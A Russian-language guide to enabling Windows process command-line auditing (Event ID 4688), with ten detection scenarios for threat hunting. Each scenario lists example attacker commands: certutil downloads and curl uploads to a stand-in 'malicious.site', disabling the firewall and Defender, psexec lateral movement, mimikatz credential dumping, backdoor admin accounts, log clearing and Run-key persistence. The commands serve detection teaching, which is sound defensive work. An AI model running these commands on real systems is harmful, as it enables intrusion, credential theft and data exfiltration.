Логирование командной строки

Включение логирования командной строки в события создания процессов

Логирование командной строки в событиях создания процессов — это важная функция для мониторинга безопасности, которая позволяет отслеживать, какие команды были выполнены при запуске процессов.

1. Откройте Редактор групповых политик

2. Перейдите в раздел:

   • Конфигурация компьютера → Административные шаблоны → Система → Аудит процессов.

3. Включите политику "Включить аудит командной строки"

После включения этой политики в событиях создания процессов (Event ID 4688) будет добавлена информация о командной строке, которая использовалась для запуска процесса. Это позволяет отслеживать, какие команды выполняются на системе, что помогает обнаруживать подозрительную активность.

Обычно правила обнаружения, основанные на паттернах командной строки, не самые надежные и легко обходятся. Но это полезно, когда атакующие применяют системные утилиты для проведения атак.

Некоторые сценарии обнаружения по артефактам командной строки

1. Загрузка вредоносного ПО с помощью LolBas

• Описание: Злоумышленники могут использовать командную строку для загрузки и запуска вредоносных файлов.

• Примеры команд:

  certutil -urlcache -split -f http://malicious.site/malware.exe C:\Windows\Temp\malware.exe
  C:\Windows\Temp\malware.exe

• Как обнаружить: Логирование покажет команды загрузки файлов с помощью утилит, таких как certutil, bitsadmin или curl.

Ну в целом, в целом... Только для LOLBas обнаружение по паттернам командной строки является надежным способом обнаружения. Для всего остального можно использовать такой подход, но лучше иметь более надежные способы.

Про подход к написанию детектирующей логики: Разработка правил обнаружения атак

Подборка всех видов LOLbins: https://lolol.farm/

---

2. Обход защиты (Bypass)

• Описание: Злоумышленники могут использовать командную строку для отключения антивируса, брандмауэра или других средств защиты.

• Примеры команд:

  netsh advfirewall set allprofiles state off
  sc config WinDefend start= disabled

• Как обнаружить: Логирование покажет команды, связанные с отключением защиты, такие как netsh, sc config, или reg add.

---

3. Горизонтальное перемещение (Lateral Movement)

• Описание: Злоумышленники могут использовать командную строку для перемещения по сети, используя утилиты, такие как psexec, wmic или schtasks.

• Примеры команд:

  psexec \\target-pc -u admin -p password C:\Windows\Temp\malware.exe
  wmic /node:target-pc process call create "C:\Windows\Temp\malware.exe"

• Как обнаружить: Логирование покажет команды, связанные с удаленным выполнением кода или перемещением по сети.

---

4. Кража данных (Data Exfiltration)

• Описание: Злоумышленники могут использовать командную строку для копирования или отправки данных на внешние серверы.

• Примеры команд:

  robocopy C:\Documents\Confidential\ \\attacker-server\share
  curl -F "file=@C:\Documents\Confidential\file.txt" http://malicious.site/upload

• Как обнаружить: Логирование покажет команды, связанные с копированием или отправкой данных, такие как robocopy, curl или ftp.

---

5. Использование известных утилит для взлома

• Описание: Злоумышленники могут использовать известные утилиты, такие как mimikatz, для кражи учетных данных или повышения привилегий.

• Примеры команд:

  mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

• Как обнаружить: Логирование покажет запуск подозрительных утилит, таких как mimikatz, procdump или pwdump.

---

6. Создание backdoor-ов

• Описание: Злоумышленники могут использовать командную строку для создания backdoor-ов, таких как добавление новых пользователей или настройка удаленного доступа.

• Примеры команд:

  net user hacker Password123 /add
  net localgroup administrators hacker /add

• Как обнаружить: Логирование покажет команды, связанные с созданием пользователей или изменением групп.

---

7. Атаки на Active Directory

• Описание: Злоумышленники могут использовать командную строку для атак на Active Directory. Или для разведки.

• Примеры команд:

  dsquery user -name admin
  net user /domain

• Как обнаружить: Логирование покажет команды, связанные с Active Directory, такие как dsquery, net user /domain и другие.

---

8. Скрытие следов (Anti-Forensics)

• Описание: Злоумышленники могут использовать командную строку для удаления логов или скрытия своей активности.

• Примеры команд:

  wevtutil cl Security
  del C:\Windows\Temp\malware.exe

• Как обнаружить: Логирование покажет команды, связанные с удалением логов или файлов, такие как wevtutil, del или rm.

---

9. Атаки на реестр

• Описание: Злоумышленники могут использовать командную строку для изменения реестра, например, для добавления автозагрузки.

• Примеры команд:

  reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Malware /t REG_SZ /d "C:\Windows\Temp\malware.exe"

• Как обнаружить: Логирование покажет команды, связанные с изменением реестра, такие как reg add или reg delete.

Реестр Windows: ключ к системе

---

10. Атаки на сетевые ресурсы

• Описание: Злоумышленники могут использовать командную строку для сканирования сети или атак на сетевые ресурсы.

• Примеры команд:

  ping 192.168.1.1
  net view \\target-pc

• Как обнаружить: Логирование покажет команды, связанные с сетевыми утилитами, такими как ping, net view или nmap.

---

Несмотря на то, что такие правила обнаружения легко обойти, они всегда приминимы для обнаружения LolBas.

Для многих из описанных случаев, регистрируются и другие события, например Event ID 4720 (создание пользователя) или Sysmon 13 (изменение параметра реестра). Используйте гибридный подход для обнаружения любых аномалий в вашей сети.